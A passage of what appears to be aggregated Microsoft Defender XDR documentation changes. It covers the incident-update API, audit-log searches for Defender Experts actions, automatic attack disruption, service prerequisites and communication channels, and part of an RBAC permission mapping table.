-determination|Enum|Specifies the determination of the incident. <p>Possible determination values for each classification are: <br><li> <b>True positive</b>: `MultiStagedAttack` (Multi staged attack), `MaliciousUserActivity` (Malicious user activity), `CompromisedAccount` (Compromised account) ΓÇô consider changing the enum name in public api accordingly, `Malware` (Malware), `Phishing` (Phishing), `UnwantedSoftware` (Unwanted software), and `Other` (Other). <li> <b>Informational, expected activity:</b> `SecurityTesting` (Security test), `LineOfBusinessApplication` (Line-of-business application), `ConfirmedActivity` (Confirmed activity) - consider changing the enum name in public api accordingly, and `Other` (Other). <li> <b>False positive:</b> `Clean` (Not malicious) - consider changing the enum name in public api accordingly, `NoEnoughDataToValidate` (Not enough data to validate), and `Other` (Other).
-tags|string list|List of Incident tags.
-comment|string|Comment to be added to the incident.
-
-> [!NOTE]
-> Around August 29, 2022, previously supported alert determination values ('Apt' and 'SecurityPersonnel') will be deprecated and no longer available via the API.
-
-## Response
-
-If successful, this method returns `200 OK`. The response body contains the incident entity with updated properties. If an incident with the specified ID wasn't found, the method returns
- `404 Not Found`.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```HTTP
- PATCH https://api.security.microsoft.com/api/incidents/{id}
-```
-
-### Request data example
-
-```json
-{
- "status": "Resolved",
- "assignedTo": "secop2@contoso.com",
- "classification": "TruePositive",
- "determination": "Malware",
- "tags": ["Yossi's playground", "Don't mess with the Zohan"],
- "comments": [
- {
- "comment": "pen testing",
- "createdBy": "secop2@contoso.com",
- "createdTime": "2021-05-02T09:34:21.5519738Z"
- },
- {
- "comment": "valid incident",
- "createdBy": "secop2@contoso.comt",
- "createdTime": "2021-05-02T09:36:27.6652581Z"
- }
- ]
-}
-```
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Access the Microsoft Defender XDR APIs](api-access.md)-- [Learn about API limits and licensing](api-terms.md)-- [Understand error codes](api-error-codes.md)-- [Incident APIs](api-incident.md)-- [List incidents](api-list-incidents.md)-- [Incidents overview](incidents-overview.md)-
security Auditing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/auditing.md
- Title: How to search the audit logs for actions performed by Defender Experts-
-description: As a tenant administrator, you can use Microsoft Purview to search the audit logs for the actions Microsoft Defender Experts did in your tenant to perform their investigations
------
- - m365-security
- - tier1
- - essentials-compliance
- Previously updated : 05/29/2023--
-# Auditing
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-As a tenant administrator, you can use Microsoft Purview to search the audit logs for the times Microsoft Defender Experts signed into your tenant and the actions they did there to perform their investigations. You can also search the audit logs for the changes done by your tenant administrators to the Defender Experts settings.
-
-[Audit (Standard)](/microsoft-365/compliance/audit-solutions-overview) is turned on by default for all Microsoft Defender Experts for XDR customers when paid licenses are assigned to the tenant. If you have a trial license, work with your service delivery manager to turn on Audit if it isn't yet.
-
-> [!NOTE]
-> Make sure you have the right [permissions](/microsoft-365/compliance/audit-log-search#before-you-search-the-audit-log) to search for audit logs.
-
-## Search the audit logs for actions performed by Defender Experts
-
-1. Sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com/) to use [Audit New Search](/microsoft-365/compliance/audit-new-search).
-2. Provide a **Date and time range (UTC)**.
-3. Select the **Workload** and **Record type** from the list shown in the following table to further narrow your search.
-4. Select **Search** to list the audit logs related to actions taken by our experts in your tenant.
--
-| Action performed by Defender Experts | Workload | Record type |
-|--|--|--|
-| Sign into customer tenant | AzureActiveDirectory | AzureActiveDirectoryStsLogon |
-| Make changes to incidents in Microsoft Defender portal | Microsoft365Defender | MS365Dincident |
-|Make changes to alert suppression rules in Microsoft Defender portal|Microsoft365Defender|MS365DSuppressionRule|
-|Make changes to indicators in Microsoft Defender for Endpoint|MicrosoftDefenderForEndpoint|MSDEIndicatorsSettings|
-|Perform device remediation actions in Microsoft Defender for Endpoint|MicrosoftDefenderForEndpoint|MSDEResponseActions|
--
-## Search the audit logs for actions performed by your administrators in the Defender Experts settings
-
-1. Sign into the [Microsoft Purview compliance portal](https://compliance.microsoft.com/) to use [Audit New Search](/microsoft-365/compliance/audit-new-search).
-2. Provide a **Date and time range (UTC)**.
-3. Under **Workload**, choose _MicrosoftDefenderExperts_.
-4. Select **Search** to list the audit logs related to actions taken by your tenant administrators to the Defender Experts settings.
--
-## Search the audit logs using a PowerShell script
-
-In addition to using Audit New Search in the Microsoft Purview compliance portal, you can use PowerShell cmdlets to search for audit logs. [Learn more](/microsoft-365/compliance/audit-log-search-script).
-
-### See also
-
-[Important considerations for Microsoft Defender Experts for XDR](additional-information-xdr.md)
security Autoad Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/autoad-results.md
- Title: Details and results of an automatic attack disruption action
-description: View the results and key findings of automatic attack disruption in Microsoft Defender XDR
--- NOCSH-- Previously updated : 02/22/2023---- m365-security-- tier2---- autoir-- admindeeplinkDEFENDER---
-# Details and results of an automatic attack disruption action
--
-**Applies to:**
-- Microsoft Defender XDR-
-With Microsoft Defender XDR, when an automatic attack disruption triggers, details about the risk and the containment status of compromised assets are available during and after the process. You can view these on the Incident page, which provides the full details of the attack and the up-to-date status of associated assets.
-
-## Review the incident graph
-
-Microsoft Defender XDR automatic attack disruption is built-in in the Incident view. Reviewing the incident graph enables you to get the entire attack story and assess the attack disruption impact and status.
-
-Here are some examples of what it looks like:
--- Disrupted incidents include a tag for 'Attack Disruption' and the specific threat type identified (i.e., ransomware). If you subscribe to incident email notifications, these tags also appear in the emails.-- A highlighted notification below the incident title indicating that the incident was disrupted.-- Suspended users and contained devices appear with a label indicating their status.-
-To release a user account or a device from containment, click on the contained asset and click **release from containment** for a device or **enable user** for a user account.
-
-## Track the actions in the Action center
-
-The Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) brings together [remediation](m365d-remediation-actions.md) and response actions across your devices, email & collaboration content, and identities. Actions listed include remediation actions that were taken automatically or manually. You can view automatic attack disruption actions in the Action center.
-
-After you mitigate the risk and complete the investigation of an incident, you can release the contained assets from the action details pane (e.g., enable a disabled user account or release a device from containment). For more information about the action center, see [Action center](m365d-action-center.md).
-
-## Next step
--- [Get email notifications for response actions](m365d-response-actions-notifications.md)
security Automatic Attack Disruption https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/automatic-attack-disruption.md
- Title: Automatic attack disruption in Microsoft Defender XDR
-description: Automatically contain assets controlled by attackers by using automatic attack disruption in Microsoft Defender XDR.
-
- - NOCSH
----
- - m365-security
- - tier1
- - usx-security
- - usx-security
-
- - MOE150
- - MET150
Previously updated : 02/21/2024--
-# Automatic attack disruption in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-Microsoft Defender XDR correlates millions of individual signals to identify active ransomware campaigns or other sophisticated attacks in the environment with high confidence. While an attack is in progress, Defender XDR disrupts the attack by automatically containing compromised assets that the attacker is using through automatic attack disruption.
-
-Automatic attack disruption limits lateral movement early on and reduces the overall impact of an attack, from associated costs to loss of productivity. At the same time, it leaves security operations teams in complete control of investigating, remediating, and bringing assets back online.
-
-This article provides an overview of automated attack disruption and includes links to the next steps and other resources.
-
-## How automatic attack disruption works
-
-Automatic attack disruption is designed to contain attacks in progress, limit the impact on an organization's assets, and provide more time for security teams to remediate the attack fully. Attack disruption uses the full breadth of our extended detection and response (XDR) signals, taking the entire attack into account to act at the incident level. This capability is unlike known protection methods such as prevention and blocking based on a single indicator of compromise.
-
-While many XDR and security orchestration, automation, and response (SOAR) platforms allow you to create your automatic response actions, automatic attack disruption is built in and uses insights from Microsoft security researchers and advanced AI models to counteract the complexities of advanced attacks. Automatic attack disruption considers the entire context of signals from different sources to determine compromised assets.
--
-Automatic attack disruption operates in three key stages:
--- It uses Defender XDR's ability to correlate signals from many different sources into a single, high-confidence incident through insights from endpoints, identities, email and collaboration tools, and SaaS apps.-- It identifies assets controlled by the attacker and used to spread the attack.-- It automatically takes response actions across relevant Microsoft Defender products to contain the attack in real-time by isolating affected assets.-
-This game-changing capability limits a threat actor's progress early on and dramatically reduces the overall impact of an attack, from associated costs to loss of productivity.
-
-## Establishing high confidence when taking automatic action
-
-We understand that taking automatic action sometimes comes with hesitation from security teams, given the potential impact it can have on an organization. Therefore, the automatic attack disruption capabilities in Defender XDR are designed to rely on high-fidelity signals. It also uses Defender XDR's incident correlation with millions of Defender product signals across email, identity, applications, documents, devices, networks, and files. Insights from the continuous investigation of thousands of incidents by Microsoft's security research team ensure that automatic attack disruption maintains a high signal-to-noise ratio (SNR).
-
-Investigations are integral to monitoring our signals and the attack threat landscape to ensure high quality and accurate protection.
-
-> [!TIP]
-> This article describes how attack disruption works. To configure these capabilities, see [Configure attack disruption capabilities](configure-attack-disruption.md) in Microsoft Defender XDR.
-
-## Automated response actions
-
-Automatic attack disruption uses Microsoft-based XDR response actions. Examples of these actions are:
--- [Device contain](/microsoft-365/security/defender-endpoint/respond-machine-alerts#contain-devices-from-the-network) - based on Microsoft Defender for Endpoint's capability, this action is an automatic containment of a suspicious device to block any incoming/outgoing communication with the said device.--- [Disable user](/defender-for-identity/remediation-actions) - based on Microsoft Defender for Identity's capability, this action is an automatic suspension of a compromised account to prevent additional damage like lateral movement, malicious mailbox use, or malware execution.--- [Contain user](../defender-endpoint/respond-machine-alerts.md#contain-user-from-the-network) - based on Microsoft Defender for Endpoint's capability, this response action automatically contains suspicious identities temporarily to help block any lateral movement and remote encryption related to incoming communication with Defender for Endpoint's onboarded devices.-
-For more information, see [remediation actions](m365d-remediation-actions.md) in Microsoft Defender XDR.
-
-### Automated response actions for SAP with Microsoft Sentinel (Preview)
-
-If you're using the [unified security operations platform](microsoft-sentinel-onboard.md) and also deployed the Microsoft Sentinel solution for SAP applications, you can also deploy automatic attack disruption for SAP.
-
-For example, deploy attack disruption for SAP to contain compromised assets by locking suspicious SAP users in case of a financial process manipulation attack.
-
-After the risk is mitigated, Microsoft Defender admins can manually unlock the users that had been automatically locked by the attack disruption response. The ability to manually unlock users is available from the Microsoft Defender action center, and only for users that were locked by attack disruption.
-
-For more information, see [Track the actions in the Action center](autoad-results.md#track-the-actions-in-the-action-center) and [Deploy automatic attack disruption for SAP](https://aka.ms/attack-disrupt-sentinel).
-
-## Identify when an attack disruption happens in your environment
-
-The Defender XDR incident page will reflect the automatic attack disruption actions through the attack story and the status indicated by a yellow bar (Figure 1). The incident shows a dedicated disruption tag, highlight the status of the assets contained in the incident graph, and add an action to the Action Center.
-
-*Figure 1. Incident view showing the yellow bar where automatic attack disruption took action*
-
-The Defender XDR user experience now includes additional visual cues to ensure visibility of these automatic actions. You can find them across the following experiences:
-
-1. In the incident queue:
-
- - A tag titled *Attack Disruption* appears next to affected incidents
-
-1. On the incident page:
-
- - A tag titled *Attack Disruption*
- - A yellow banner at the top of the page that highlights the automatic action taken
- - The current asset status is shown in the incident graph if an action is done on an asset, for example, account disabled or device contained
-
-3. Via API:
-
- An **(attack disruption)** string is added to the end of the titles of incidents with high confidence likely to be automatically disrupted. For example:
-
- *BEC financial fraud attack launched from a compromised account (attack disruption)*
-
-For more information, see [view attack disruption details and results](autoad-results.md).
-
-## Next steps
--- [Configuring automatic attack disruption in Microsoft Defender XDR](configure-attack-disruption.md)-- [View details and results](autoad-results.md)-- [Get email notifications for response actions](m365d-response-actions-notifications.md)--
security Before You Begin Defender Experts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/before-you-begin-defender-experts.md
- Title: Key infrastructure requirements before enrolling in the Microsoft Defender Experts for Hunting service-
-description: This section outlines the key infrastructure requirements you must meet and important information on data access and compliance
-----
- - m365-security
- - m365initiative-defender-endpoint
- - tier1
- Previously updated : 04/05/2024--
-# Before you begin using Defender Experts for Hunting
--
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-This document outlines the key infrastructure requirements you must meet and important information on data access and compliance you must know before purchasing the Microsoft Defender Experts for Hunting service. Microsoft understands that customers who use our managed services entrust us with their most valued asset, their data.
-
-## Check if your environment meets licensing and access prerequisites
-
-Microsoft Defender Experts for Hunting is a separate service from your existing Defender products. Before enrolling in this service, make sure that you have the necessary license and access.
-
-### Eligibility and licensing
-
-To enable us to get started with this threat hunting service, we require the following licensing prerequisites:
--- Microsoft Defender for Endpoint P2 must be licensed and enabled on eligible devices-- Microsoft Defender Antivirus must be licensed and enabled in active mode on devices onboarded to Defender for Endpoint (required for endpoint detection and response capabilities)-
-The following products are also eligible to get Defender Experts for Hunting coverage, and you must have their appropriate product licenses to get started with the service:
--- Microsoft Defender for Office 365 P2-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps-
-The following product is **not** covered by this service:
--- Microsoft Defender for IoT-
-### Server coverage
-
-Defender Experts for Hunting also covers serversΓÇöwhether on premises or on a hyperscale cloud service providerΓÇöthat have Defender for Endpoint deployed on them with a Microsoft Defender for Endpoint for Servers license. For Defender Experts coverage, a server is considered as a user account for billing. The service doesn't cover Microsoft Defender for Cloud.
-[Learn more about specific hardware and software requirements](/microsoft-365/security/defender-endpoint/minimum-requirements)
-
-### Ask Defender Experts
-
-Defender Experts for Hunting customers are assigned 10 **Ask Defender Experts** credits, which you can use to submit questions, at the start of each calendar quarter. Unused credits from the current quarter roll up to the next one. You can use up to 20 credits only per quarter. All unused credits expire by the end of the calendar year or at the end of your subscription term, whichever comes first.
-
-[Learn more about Microsoft's commercial licensing terms](https://www.microsoft.com/licensing/terms/productoffering/Microsoft365/MCA)
-
-### Access requirements
-
-Anyone from your organization can complete the customer interest form for Microsoft Defender Experts for Hunting service, however, you need to work with your Commercial Executive to transact the SKU. You might need certain roles and permissions to fully access the service capabilities. Refer to [Custom roles in role-based access control for Microsoft Defender XDR](custom-roles.md) for details.
-
-## Understand the service's availability and data access requirements
-
-Defender Experts for Hunting is a managed threat hunting service that proactively hunts for threats across endpoints, email, identity, and cloud apps. To carry out hunting on your behalf, Microsoft experts need access to your Microsoft Defender XDR advanced hunting data. Enrolling in this service means you're granting permission to Microsoft experts to access the said data.
-
-The following sections enumerate additional information about the service's data usage, compliance, and availability. For more information about Microsoft's commitment in valuing and protecting your data, visit the [Trust Center](https://www.microsoft.com/en-us/trust-center/product-overview) then scroll down to **Additional products and services** > **Managed Security Services** > [**Microsoft Defender Expert for Hunting**](https://aka.ms/trustcenter-defenderexperts).
-
-### Data collection, usage, and retention
-
-All data used for hunting from existing Defender services will continue to reside in the customer's original Microsoft Defender XDR service storage location. [Learn more](../../enterprise/o365-data-locations.md)
-
-Defender Experts for Hunting operational data, such as case tickets and analyst notes, are generated and stored in a Microsoft data center in the US region for the length of the service, irrespective of the Microsoft Defender XDR service storage location. Data generated for the reporting dashboard is stored in customer's Microsoft Defender XDR service storage location. Reporting data and operational data will be retained for a grace period of no more than 90 days after a customer's subscription expires. If the customer terminates their subscription, data will be deleted within 30 days.
-
-Microsoft experts hunt over [advanced hunting logs](../../security/defender/advanced-hunting-schema-tables.md) in Microsoft Defender XDR advanced hunting tables. The data in these tables depend on the set of Defender services the customer is enabled for (for example, Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Identity, Microsoft Defender for Cloud Apps, and Microsoft Entra ID). Experts also use a large set of internal threat intelligence data to inform their hunting and automation.
-
-### Security and compliance
-
-When you purchase and onboard to Defender Experts for Hunting, you're granting permission to Microsoft experts to access your advanced hunting data.
-
-This service has been developed in alignment with existing security and privacy standards and is working towards several certifications, including ISO 27001 and ISO 27018.
-
-### Availability
-
-This service is available worldwide for customers in our commercial public clouds. It's currently not available to customers in government and sovereign clouds.
-
-### Languages
-
-This service is currently delivered in English language only.
-
-## Apply for Microsoft Defender Experts for Hunting service
-
-If you haven't done so yet, you can complete the customer interest form for Defender Experts for Hunting:
-
-1. Complete the [customer interest form](https://aka.ms/DEX4HuntingCustomerInterestForm). Anyone from your company can apply, but if you're accepted, you need to work with your Commercial Executive to transact the SKU.
-2. Enter your name, company name, and company email ID.
-3. Select **Submit**. Someone from our sales team will reach out within five business days.
-
-### Next step
--- [Start using Defender Experts for Hunting](onboarding-defender-experts-for-hunting.md)
security Before You Begin Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/before-you-begin-xdr.md
- Title: Before you begin using Defender Experts for XDR-
-description: To enable us to get started with this managed service, we require the following licensing prerequisites
------
- - m365-security
- - tier1
- Previously updated : 11/10/2023--
-# Before you begin
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-This document outlines the key prerequisites you must meet and essential information you must know before purchasing the Microsoft Defender Experts for XDR service.
-
-## Eligibility and licensing
-
-Defender Experts for XDR is a separate service from your existing Defender products. To enable us to get started with this managed service, we require the following licensing prerequisites:
--- Microsoft Defender for Endpoint P2 must be licensed and enabled on eligible devices-- Microsoft Defender Antivirus must be licensed and enabled in active mode on devices onboarded to Defender for Endpoint (required for endpoint detection and response capabilities)-- Microsoft Entra ID P1 must be licensed for all users and enabled (required for enabling secure service provider access)-
-The following products are also eligible to get Defender Experts for XDR coverage, and you must have their appropriate product licenses to get started with the service:
--- Microsoft Defender for Office 365 P2-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps-
-The following product is **not** covered by this service:
--- Microsoft Defender for IoT-
-Defender Experts for XDR is a managed extended detection and response (XDR) service. To get native XDR coverage, we recommend deploying the full Microsoft Defender XDR suite.
-
-### Server coverage
-
-Defender Experts for XDR also covers serversΓÇöwhether on premises or on a hyperscale cloud service providerΓÇöthat have Defender for Endpoint deployed on them with a Microsoft Defender for Endpoint for Server license. For Defender Experts coverage, a server is considered as a user account for billing. The service doesn't cover Microsoft Defender for Cloud workloads.
-[Learn more about specific hardware and software requirements](/microsoft-365/security/defender-endpoint/minimum-requirements).
-
-### Ask Defender Experts
-
-As part of the service's built-in [Microsoft Defender Experts for Hunting](defender-experts-for-hunting.md), you're also assigned 10 **Ask Defender Experts** credits, which you can use to submit questions, at the start of each calendar quarter. Unused credits from the current quarter roll up to the next one. You can use up to 20 credits only per quarter. All unused credits expire by the end of the calendar year or at the end of your subscription term, whichever comes first.
-
-[Learn more about Microsoft's commercial licensing terms](https://www.microsoft.com/licensing/terms/productoffering/Microsoft365/MCA).
--
-## Access requirements
-
-Work with your Commercial Executive to transact the Defender Experts for XDR SKU.
-
-Defender Experts for XDR requests for certain roles and permissions for you to fully access the service capabilities. [Learn more](dex-xdr-permissions.md).
-
-## Service availability and data protection
-
-Defender Experts for XDR is a managed extended detection and response service that proactively hunts for threats across endpoints, email, identity, and cloud apps. To carry out hunting on your behalf, Microsoft experts need access to your Microsoft Defender XDR advanced hunting data. Purchasing this service means you're granting permission to Microsoft experts to access the said data.
-
-The following sections enumerate additional information about the service's data usage, compliance, and availability. For more information about Microsoft's commitment in valuing and protecting your data, visit the [Trust Center](https://www.microsoft.com/en-us/trust-center/product-overview) then scroll down to **Additional products and services** > **Managed Security Services** > **[Microsoft Defender Experts](https://aka.ms/trustcenter-defenderexperts)**.
-
-### Data collection, usage, and retention
-
-All data used for hunting from existing Defender services will continue to reside in the customer's original Microsoft Defender XDR service storage location. [Learn more](/microsoft-365/enterprise/o365-data-locations).
-
-Defender Experts for XDR operational data, such as case tickets and analyst notes, are generated and stored in a Microsoft data center in the US region for the length of the service, irrespective of the Microsoft Defender XDR service storage location. Data generated for the reporting dashboard is stored in customer's Microsoft Defender XDR service storage location. Reporting data and operational data will be retained for a grace period of no more than 90 days after a customer's subscription expires. If the customer terminates their subscription, data will be deleted within 30 days.
-
-Microsoft experts hunt over [advanced hunting logs](advanced-hunting-schema-tables.md) in Microsoft Defender XDR advanced hunting tables. The data in these tables depend on the set of Defender services the customer is enabled for (for example, Defender for Endpoint, Defender for Office 365, Defender for Identity, Defender for Cloud Apps, and Microsoft Entra ID). Experts also use a large set of internal threat intelligence data to inform their hunting and automation.
-
-### Security and compliance
-
-When you purchase and onboard to Defender Experts for XDR, you're granting permission to Microsoft experts to access your advanced hunting data.
-
-This service has been developed in alignment with existing security and privacy standards and is working towards several certifications, including ISO 27001 and ISO 27018.
-
-### Availability
-
-This service is available worldwide for our customers in our commercial public clouds. If you're interested to learn more, reach out to your Microsoft account team.
-
-### Language
-
-This service is currently delivered in English language only.
-
-### Next step
-
-[Get started with Microsoft Defender Experts for XDR](get-started-xdr.md)
-
-### See also
-
-[General information on Defender Experts for XDR service](frequently-asked-questions.md)
-
security Communicate Defender Experts Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/communicate-defender-experts-xdr.md
- Title: Communicating with Microsoft Defender Experts-
-description: Defender Experts for XDR has multiple channels to discuss incidents, managed response, and service support
------
- - m365-security
- - tier1
- - essentials-manage
- Previously updated : 02/20/2024--
-# Communicating with experts in the Microsoft Defender Experts for XDR service
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-Microsoft Defender Experts for XDR provides you with multiple channels of communication to discuss incidents with our experts, ask them questions on demand, or get service readiness or operations support from your service delivery managers (SDMs).
-
-## Incident and managed response notifications
-
-When an incident requires your attention, such as the incidents our experts issue [managed response actions](start-using-mdex-xdr.md#managed-detection-and-response), you're notified through one or more of the following channels:
-
-### In-portal chat
-
-> [!NOTE]
-> The chat option is only available for incidents where we issued managed response.
-
-The **Chat** tab within the Microsoft Defender XDR portal provides you with a space to engage with our experts and further understand the incident, our investigation, and the required actions we provided. You could ask about a malicious executable, malicious attachment, information about activity groups, advanced hunting queries, or any other information that would assist you with the incident resolution.
--
-### Teams chat
-
-Apart from using the in-portal chat, you can also engage in real-time chat conversations with Defender Experts directly within Microsoft Teams. This capability provides you and your security operations center (SOC) team more flexibility when responding to incidents that require managed response. [Learn more about turning on notifications and chat on Teams](get-started-xdr.md#receive-managed-response-notifications-and-updates-in-microsoft-teams)
-
-Once you turn on chat on Teams, a new team named **Defender Experts team** is created and the Defender Experts Teams app is installed in it. Each incident that requires your attention is posted on this team's **Managed response** channel as a new post. To engage with our experts (for example, ask follow-up questions about the investigation summary or actions published by Defender Experts), use the **Reply** text bar to mention or tag *@Defender Experts* and type your message.
--
-**Important reminders when using the Teams chat:**
--- Our experts have access to messages in **Defender Experts team** through the Defender Experts Teams app so you don't have to explicitly them to this team. -- Our experts only see replies to existing posts created by Defender Experts regarding a managed response. If you create a new post, our experts won't be able to see it.-- While Defender Experts might have access to all messages in any channel in **Defender Experts team**, tag or mention our experts by typing *@Defender Experts* in your replies, so they're notified to join the chat conversation.-- Don't attach any attachments (for example, files for analysis) in the chat. For security reasons, Defender Experts won't be able to view the attachments. Instead, send them to appropriate submissions channels or provide links where they can be found in Microsoft Defender XDR portal.-- Conversations in the Teams chat about an incident are also synchronized with the incident's **Chat** tab in the Microsoft Defender XDR portal so that you can see messages and updates about an investigation wherever you go.-
-### Email
-
-The Defender Experts for XDR service typically sends automated emails whenever a managed response with completed or pending actions is published in the Microsoft XDR portal, or when it needs to remind you about incidents awaiting your action.
-
-However, our experts could also send out emails to your identified notification contacts directly during any of the following situations:
--- When they require additional information or context to investigate an incident-- When they detect a malicious or suspicious activity manually and outside of incidents or alerts in the Microsoft Defender XDR portal, and it requires a response action-- When they reply to the requests or queries sent to them through email-
-> [!IMPORTANT]
-> Remember to verify emails claiming to be from Defender Experts.
-
-### Phone call
-
-In break-glass scenarios or matters that require immediate attention (for example, malware on high-value infrastructure, ransomware, data exfiltration, insider threat, or other signs of a determined human adversary), our experts reach out to your identified **incident notification contacts** using the details you provided, including calling their listed phone numbers. [Learn more about adding contact persons or groups for incident notifications](get-started-xdr.md#tell-us-who-to-contact-for-important-matters)
-
-## Ask Defender Experts
-
-While the previous scenarios involve our experts initiating communication with you, you can also request advanced threat expertise on demand by selecting **Ask Defender Experts** directly inside the Microsoft Defender XDR portal. [Learn more](experts-on-demand.md)
-
-## Collaborating with your service delivery manager
-
-The service delivery manager (SDM) is responsible for managing the overall relationship for your organization with the Defender Experts for XDR service. They are your trusted advisor working along with XDR experts' team to help you protect your organization.
-
-The SDM provides the following
--- Service readiness support
- - Educate customers about the end-to-end service experience, from signup to regular operations and escalation process.
- - Help establish a service-ready security posture, including guidance on required controls and policy updates.
-- Service operations support
- - Provide tailored service delivery content and reporting, including periodic business reviews.
- - Serve as a single point of contact for feedback and escalations related to Defender Experts Service.
-
-The SDM engages with your identified **service review contacts**. [Learn more about adding contact persons or groups for service review and delivery](get-started-xdr.md#tell-us-who-to-contact-for-important-matters)
-
-### See also
--- [Get started with Microsoft Defender Experts for XDR](get-started-xdr.md)-- [Managed detection and response](managed-detection-and-response-xdr.md)-- [Get real-time visibility with Defender Experts for XDR reports](reports-xdr.md)-
security Compare Rbac Roles https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/compare-rbac-roles.md
- Title: Map Microsoft Defender XDR Unified role-based access control (RBAC) permissions
-description: Compare permissions and access to Microsoft Defender XDR Security portal experiences using role-based access control (RBAC)
------- m365-security-- tier3-- Previously updated : 04/11/2024---
-# Map Microsoft Defender XDR Unified role-based access control (RBAC) permissions
-
-All permissions listed within the Microsoft Defender XDR Unified RBAC model align to existing permissions in the individual RBAC models. Once you activate the Microsoft Defender XDR Unified RBAC model the permissions and assignments configured in your imported roles will replace the existing roles in the individual RBAC models.
-
-This article describes how existing roles and permissions in Microsoft Defender for Endpoint, Microsoft Defender Vulnerability Management, Microsoft Defender for Office 365, Microsoft Defender for Identity, and Microsoft Entra roles map to the roles and permission in the Microsoft Defender XDR Unified RBAC model.
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2118804)-- [Microsoft Defender for Identity](https://go.microsoft.com/fwlink/p/?LinkID=2198108)-- [Microsoft Defender for Office 365 Plan 2](https://go.microsoft.com/fwlink/p/?LinkID=2158212)-- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/p/?linkid=2229011)-- [Microsoft Defender for Cloud](/azure/defender-for-cloud/defender-for-cloud-introduction)-
-<a name='map-microsoft-365-defender-unified-rbac-permissions-to-existing-rbac-permissions'></a>
-
-## Map Microsoft Defender XDR Unified RBAC permissions to existing RBAC permissions
-
-Use the tables in the following sections to learn more about how your existing individual RBAC role definitions map to your new Microsoft Defender XDR Unified RBAC roles:
-
-1. [Map Defender for Endpoint and Defender Vulnerability Management permissions](#map-defender-for-endpoint-and-defender-vulnerability-management-permissions-to-the-microsoft-365-defender-rbac-permissions)
-2. [Map Defender for Office 365 permissions to the Microsoft Defender XDR Unified RBAC permissions](#map-defender-for-office-365-permissions-to-the-microsoft-365-defender-unified-rbac-permissions)
-3. [Map Microsoft Defender for Identity permissions](#map-microsoft-defender-for-identity-permissions-to-the-microsoft-365-defender-unified-rbac-permissions)
-4. [Microsoft Entra Global roles access](#azure-active-directory-global-roles-access)
-
-<a name='map-defender-for-endpoint-and-defender-vulnerability-management-permissions-to-the-microsoft-365-defender-rbac-permissions'></a>
-
-### Map Defender for Endpoint and Defender Vulnerability Management permissions to the Microsoft Defender XDR RBAC permissions
-
-|Defender for Endpoint and Defender Vulnerability Management permissions|Microsoft Defender XDR Unified RBAC permission|
-||||
-|View data - Security operations|Security operations \ Security data \ Security data basics (read)|
-|View data - Defender Vulnerability Management|Security posture \ Posture management \ Vulnerability management (read)|
-|Alerts investigation|Security operations \ Security data \ Alerts (manage)|
-|Active remediation actions - Security operations|Security operations \ Security data \ Response (manage)|
-|Active remediation actions - Defender Vulnerability Management - Exception handling|Security posture \ Posture management \ Exception handling (manage)|
-|Active remediation actions - Defender Vulnerability Management - Remediation handling|Security posture \ posture management \ Remediation handling (manage)|
-|Active remediation actions - Defender Vulnerability Management - Application handling|Security posture \ Posture management \ Application handling (manage)|
-|Defender Vulnerability management ΓÇô Manage security baselines assessment profiles|Security posture \ posture management \ Security baselines assessment (manage)|
-|Live response capabilities|Security operations \ Basic live response (manage)|
-|Live response capabilities - advanced|Security operations \ Advanced live response (manage) </br> Security operations \ Security data \ File collection (manage)|
-|Manage security settings in the Security Center | Authorization and settings \ Security settings \ Core security settings (manage) </br> Authorization and settings\Security settings \ Detection tuning (manage)|
-|Manage portal system settings|Authorization and settings \ System setting (Read and manage)|
-|Manage endpoint security settings in Microsoft Intune|Not supported - this permission is managed in the Microsoft Intune admin center|
-
-<a name='map-defender-for-office-365-permissions-to-the-microsoft-365-defender-unified-rbac-permissions'></a>
-
-### Map Defender for Office 365 permissions to the Microsoft Defender XDR Unified RBAC permissions
-
-Use the following tables to learn how your existing Email & collaboration and protection-related Exchange Online permissions for Defender for Office 365 map to the new Microsoft Defender XDR Unified RBAC permissions:
--- [Email & collaboration permissions mapping](#email--collaboration-permissions-mapping)-- [Exchange Online permissions mapping](#exchange-online-permissions-mapping)-
-#### Email & collaboration permissions mapping
-
-You configured Email & collaboration permissions in the Defender portal at <https://security.microsoft.com/emailandcollabpermissions>.
-
-|Email & collaboration permission|Type|Microsoft Defender XDR Unified RBAC permission|
-||||
-|Global Reader|Role group|Security operations \ Security data \ Security data basics (read) </br> Security operations \ Raw data (Email & collaboration) \ Email message headers (read) </br> Security operations \ Security data \ Response (manage) </br> Authorization and settings \ Security settings \ Core security settings (read) </br> Authorization and settings \ System setting (read)|
